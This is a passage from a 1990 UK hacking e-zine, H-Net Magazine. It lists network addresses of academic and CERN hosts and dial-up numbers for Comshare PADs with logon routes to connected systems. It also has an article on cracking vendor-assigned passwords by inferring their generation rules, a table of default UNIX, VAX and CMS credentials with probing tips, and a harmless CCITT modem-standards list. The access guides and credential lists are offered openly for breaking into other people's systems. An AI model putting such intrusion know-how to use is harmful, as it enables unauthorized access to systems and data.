EAVA East Anglia (Stocker) VAX >000008006003 EAVB East Anglia (CPC) VAX >000008012701 CAVB HEP Vax at Cambridge >000009001001 CPXA Cernnet Gateway >000009001003 CPXB CERN reverse PAD (Test) >000009003001#0 CPXC CERN Memotec Pad. >000009003002#0 CPIA CERN WYLBUR >000009003003#1 CPVM CERN Aleph Development Vax >000009003003#3 CPVL CERN L3 Vax 11/750 >000009003003#5 CPVG CERN VXGIFT >000009003004#1 CPVC CERN Omega Vax 11/780 >000009003004#2 CPVF CERN Aleph Test Beam Vax 11/750 >000009003004#3 CPVA CERN OC Development Vax 11/750 >000009003004#4 CPVD CERN Merlin Vax >000009003005#3 CPVV CERN Central Vax 8600 >000009003006#1 CPVN CERN VXNA31 Frm 6; Next> >000009003007#1 CPVS CERN VXBSSY >000009501001 DYVB Tasso VAX 11/780 at DESY, Hamburg >000010100001 MAVG VAX 11/750 at Manchester CGU >000010109001 MAVS Manchester Starlink Vax 750 >000010120200 MAGB DL GEC 4190 at Manchester >00001012030002 MANV2 Manchester Physics Vax 2. >000010216001 UMPA PRIME at UMIST >000010404000 LAVB Lancaster University VAX >000010411000 LAVA Lancaster University HEP VAX. >000010501460 LLIA Liverpool HEP IBM 4331 >000010501460.XXXP LLIAP Liverpool HEP IBM 4331 >000011200250 QUVA Vax in Applied Maths Belfast >000012110002 BDGA GEC 4090 at Bradford >000014000300 DUVS Durham Starlink VAX >000014901000*P7*W2.SPCP NRS NRS Prime >000020013201 BHIA IBM 4341 BIRMINGHAM >000020013201.XXXP BHIAP IBM 4341 BIRMINGHAM >000020013301 BHVS Starlink VAX at Birmingham >000020013501 BHGB DL NSF GEC 4065 at Birmingham >000021000008 NMPA PRIME at Nottingham >000021110101 LTGA ICF GEC 4090 at Loughborough >000040000040.PSS LPSS JNT London PSS Gateway Frm 7; Next> >000040000040 LNXB JNT London 4160 PSS Gateway >00004960000001 ESSEX Essex Computer Service. >00005000500150 RLGJ GEC 4190 - JNT/NE NMU >000050005002 RLGG GEC 4160 - JANET News Machine >000050005002 NEWS GEC 4160 - JANET News Machine >000050200013 XXVE Oxford Comp. Centre Vax >000050200014 XXVF Oxford Comp. Centre Vax >000050250050 XXVA Oxford Physics Vax >000052005000 WKGA GEC 4000 machine at Warwick. >000052100100 MUVA MSSL Vax/780 >000060210005 BRVA Bristol Physcis Dept VAX. >000060500001*P7*W2 EXPA Exeter Prime. >000060500003*P7*W2 EXPC Exeter Prime. >000060500004*P7*W2 EXPD Exeter Prime. >000060500005*P7*W2 EXPE Exeter Prime. >000071100009 GWIA IBM 4341 at Glasgow >000071100009.XXXP GWIAP IBM 4341 at Glasgow >000000000068 GWIA IBM 4341 at Glasgow >000000000068.XXXP GWIAP IBM 4341 at Glasgow >000071104001 GWGA GEC 4180 at Glasgow End of file - Frm 8; Next> =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #08 of 20 H N N E Comshare PADS+Info by Knight_of_ni E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H Debenhams Comshare PADs --------- -------- ---- 300/300 1200/75 Aberdeen 0224 573405 0224 573405 Aberdeen 0224 580281 0224 580281 Belfast 0232 249290 Bedford 0234 218233 0234 218233 Birmingham 021 233 4165 Birmingham 021 705 7070 021 704 4011 Bournemouth 0202 25542 0202 25542 Brighton 0273 203551 0273 203551 Bristol 0272 279977 Bristol 0272 215481 0272 215481 Cambridge 0223 351312 0223 351312 Canterbury 0227 67571 0227 67571 Cardiff 0222 384511 Cardiff 0222 372471 0222 372471 Carlisle 0228 31667 0228 31667 Chelmsford 0245 87512 0245 87512 Chester 0244 310073 0244 310073 Chester 0244 47002 Derby 0332 31727 0332 31727 Dundee 0382 25492 0382 25492 Eastbourne 0323 647422 0323 645361 Edinburgh 031 225 8509 031 225 8509 Exeter 0392 215355 0392 215355 Folkstone 0303 43771 0303 43771 Glasgow 041 248 3397 041 248 3397 Gloucester 0452 503959 0452 503959 Grange O/Sands 04484 4661 Guildford 0483 506118 0483 579717 Harrogate 0423 60522 0423 60522 Hastings 0424 445577 0424 445577 Hull 0482 27492 0482 27492 Ipswich 0473 56431 0473 56431 Ipswich 0473 50341 Leeds 0532 459477 0532 459477 Leeds 0532 460733 Luton 0582 458505 0582 411184 Manchester 061 834 2848 061 834 4143 Manchester 061 834 5226 Middlesbrough 0642 248581 0642 248581 Newcastle 091 261 0131 091 261 0131 Northampton 0604 20253 0604 20253 Norwich 0603 667061 0603 667061 Nottingham 0602 472576 0602 412045 Oxford 0865 250888 0865 250888 Plymouth 0752 670170 0752 670170 Reading 0734 507445 0734 507445 Romford 0708 22380 0708 752861 Scarborough 0723 353891 0723 353891 Sheffield 0742 701158 0742 701158 Southampton 0703 226674 0703 229224 Southsea 0705 833621 0705 833621 Staines 0784 62151 0784 62344 Stirling 0786 73215 0786 73215 Stockport 061 477 7123 061 477 7123 Stockton on Tees 0642 677557 0642 677557 Stratford 0789 294102 0789 294102 Swansea 0792 473686 0792 473686 Swindon 0793 615471 0793 615471 Taunton 0823 251629 0823 335231 Telford 0952 507323 0952 507323 Wigan 0942 324544 0942 498111 York 0904 647041 0904 647041 ***Knight_of_ni*** To logon to comshare : at the prompt WHICH SERVICE type *CSA if you logged on at v21 *CSB if you logged on at v23 or type 3 this last one will get you a viewdata computer or type 8 this will give you HP Info . at the prompt COMSHARE: type A gives commander II system A type B gives commander II system B type C gives commander II system C type I gives commander II system I type Q gives a VM computer send a break to logon type T gives telecom gold with lots of computers off this , use CALL xx where xx is a number, eg. CALL 01 gives Campus 2000 , you can call all the usual telecom gold computers from here. type P gives access to a prompt WHICH SERVICE ,from here type all of the above or 3 which gives MERCURY LINK 7500. Sometimes at the COMSHARE prompt if you type V you'll get a decserver with 4 VAXs' hanging off it. If you come across the V working again let me know, as I've full privs on it! At the COMSHARE prompt if you type '12' you'll get results on commander II system B. Any additions or amendments please contact me on Hackernet BBS. =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #09 of 20 H N N E How to Crack Those PASSWORDS! E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H THE SO-CALLED "UNCRACKABLE" PASSWORD -------------------------------------- Many people consider the type of password - the so- called random combination of alpha and numeric characters - to be "uncrackable" because so many billions of combinations seem possible. A six-character password of this type using only letters and numerals, could have 2,238,976,116 variations. This type of password is most frequently used by large data-base vendors. It is assigned to the user by the vendor, and is often used with systems requiring only one access level (that is, no second security number) because the password is believed to be so invulnerable to cracking. In reality, however, this password format is vulnerable to solution by both doors and algorithms. In the first case, not all passwords require the presence of numbers. Passwords may be alphabetic characters only. In some cases pass- words such as "GUEST" or "IBMCE" may provide a backdoor into the system. Solution by algorithmcan also be simple because most systems do not use a truly random method for generating passwords. We know, for example, that MILNET passwords exclude certain letters and numbers. There are doubtlessly other rules involved in their construction that we could discover. A study of pass- words from a given system - we'll use Dow Jones as an example here - can reveal the patterns that are used to create such "uncrackable" passwords. Dow Jones passwords are generally 10 characters long. If character assignment were truly random, we would expect that most of the characters would be alpha- betic because there are 26 alpha characters compared to only 10 numeric char- acters. A random system would generate 2.6 alphas for each numeric character. In fact, however, Dow Jones passwords appear to have only 4 or 5 alphabetic and have 5 or 6 numeric characters. This is our first clue that the password sel- ection proccess is not random. Here is a sample of the typical Dow Jones passwords: 92J62P4BUF 35K4UPK931 59LTAN7521 Patterns are readily discernable: 1) The first two characters are numbers 2) The third character is a letter of the alphabet 3) Each password has at least two numbers that are duplicates. 4) No password has three numbers that are the same 5) Each password has one three-letter combination that includes a vowel (eg. BUF,UPK,TAN) 6) This alpha-triplet can begin at any character from the fourth to the eighth position. 7) No password has more than one vowel. 8) Passwords may have either 4 or 5 alphabetic characters. 9) While a password may have two alpha characters that are the same,these letters do not follow one another, 10) Of the 16 numbers used in the passwords above, none is a zero. Examination of a large number of passwords would doubtlessly reveal other "rules" that were used in Dow Jones password selection. Each newly-discovered "rule" would limit the actual number of available passwords and make the system that much more subject to cracking by computer. TAKING THE "RANDOM" OUT OF RANDOM One of the most notable factors in so-called tables of computerized "random" numbers is that there are two basic ways of creating them. The first method is to create a table that will provide what can statistically be said to be a random list - that is no number or letter would theoretically occur more frequently than any other number or letter. Most systems, however, simply rely on an electronic component that creates alledgedly "random" numbers. These hardware random number generators are usually biased in their number selections One simple test of a random number generator is called the "coin toss test." A program is written to simulate the results of a thousand or so coin tosses. Were the random number generator truly random, heads would appear about as frequently as tails. In an actual test, however, heads appeared 421 times, and tails appeared 579 times - a significant bias. A test such as this could be performed over the entire alphanumeric character list and the component's bias chartered. Once this information was known, the cracking computer could be programmed to insert this selection bias into it's own attempts to generate passwords. This is yet another step that evens the odds between the hacker and the so-called "uncrackable" password. This testing scheme, requiring either a component or a computer like the target computer, would be a lengthy process, but some people might regard the product as worth the time involved in preparing such an analysis. A strategy of cracking Dow Jones system, given the rules listed above, would be to create a program with an algorithm that provided combinations of passwords meeting the criteria above. As each creation was tested, a pattern might be found in the successful creations that would make the algorithm even more selective. One would expect, for example, that simular to the MILNET and ARPANET passwords, certain confusing characters would be eliminated from passwords. The number, "0" is often eliminated, for example, because it is easily confused with the letter "O". =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #10 of 20 H N N E Default Passwords by Nik & Bauderline E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H On UNIX systems at your first call enter the id 'who' on some systems you will get a list of who is online - if that works you have some valid ID's! If you know some already try them out with a 'backdoor' pass-word of 'woof'. UNIX:- ID Password -------- -------- root root sysman sysman admin admin sysadmin sysadmin (or admin) unix unix uucp uucp (or comms) rje rje guest guest demo demo daemon daemon sysbin sysbin (or bin) bin bin games games (or player sometimes) VAX:- POSTMASTER POSTMASTER SYSTEST SYSTEST FIELD FIELD FIELD SERVICE GUEST WELCOME GUEST FRIEND DEMO DEMO GEAC GEAC (on microvaxes only) USER USER SYSTEM MANAGER USERP USERP VISITOR VISITOR REMOTE REMOTE DECNET DDECNET CMS:- OPERATNS/IPCS RSCS RSCSNET diskacnt/acnt dirmaint/dirm cmsbatch/batch datamovr/movr ispvm ipcs erep ibmcemaint smart vseipo router cprm sqldba autolog1/autolog sysdump1/sysdump pvm =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #11 of 20 H N N E CCITT Recommendations by Zed Haytey. E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H CCITT RECOMENDATIONS V series - covering data transmissions over telephone lines V1 Equivalence between binary notation stmbols and the significant cond- itions of a two conditioned code V2 Power levels for data transmission over telephone lines V3 International Alphabet No.5 (ASCII) V4 General structure of signals of International Alphabet No.5 code for data transmissions over public telephone networks V5 Standardisation of modulation rates and data signalling rates for synchronoous data transmission in general switched network V6 Ditto, on leased telephone type circuits V7-9 Not assigned V10 Electrical characteristics for unbalanced double current interchange circuits for general use with integrated circuits V11 Ditto, for balanced double current interchange circuits V12 Not assigned V13 Answerback simulator V14 Not assigned V15 Use of acoustic coupling for data transmission V16 Recommendation for modems for transmission of medical analogue data V19 Modems for parallel data transmissions using telephone signalling frequencies V20 Parallel data transmission modems standardised for universal use in the general switched network V21 300 Baud modem standardised for use in the switched telephone network V22 1200 Baud full duplex 2 wire modem standardised for use in the general switched telephone network V22b 2400 Baud full duplex 2 wire modem standardised for use in the general switched telephone network V23 600/1200 baud modem standardised for use in the general switched telephone network V24 List of definitions for interchange circuits between data terminal equipment and data circuit terminating equipment (i.e. modem) V25 Automatic calling and/or answering equipment on the general switched telephone network V25b Bit synchronous auto dialling protocol for use over PSTN V26 2400 baud modem for use on 4 wire point to point circuits V26b 2400/1200 baud modem standardised for use in the general switched telephone network V27 4800 baud modem for leased circuits V27b 4800/2400 modem with automatic adaptive equaliser standardised for use on leased circuits V27t 4800/2400 modem standardised for use on the general switched telephone network V28 Electrical characteristics for unbalanced double current interchange circuits V29 9600 baud modem for use on leased circuits V30 Not assigned V31 Electrical characteristics for single current interchange circuits controlled by contact closure V32-4Not Assigned V35 Data transmission at 48 kilobits per second using 60-108KHz group band circuits V36 Modems for synchronous data transmission using 60-108kHz group band circuits V37-9Not assigned V40 Error indication with electromechanical equipment V41 Code independent error correction system V42-9Not assigned V50 Standard limits for transmission quality of data transmission V51 Organisation of the maintenance of international telephone type circuits for data transmission V52 Characteristics of distortion and error rate measuring apparatus for data transmission V53 Limits for the maintenance of telephone type circuits used for data transmissions V54 Loop test device for modems V55 Specification for an impulsive noise measuring instrument for telephone type circuits V56 Comparative test for modems for use over telephone type circuits V57 Comprehensive test set for high signalling rates. by Zed Haytey 1990 ******************************************************************** ********************************************************************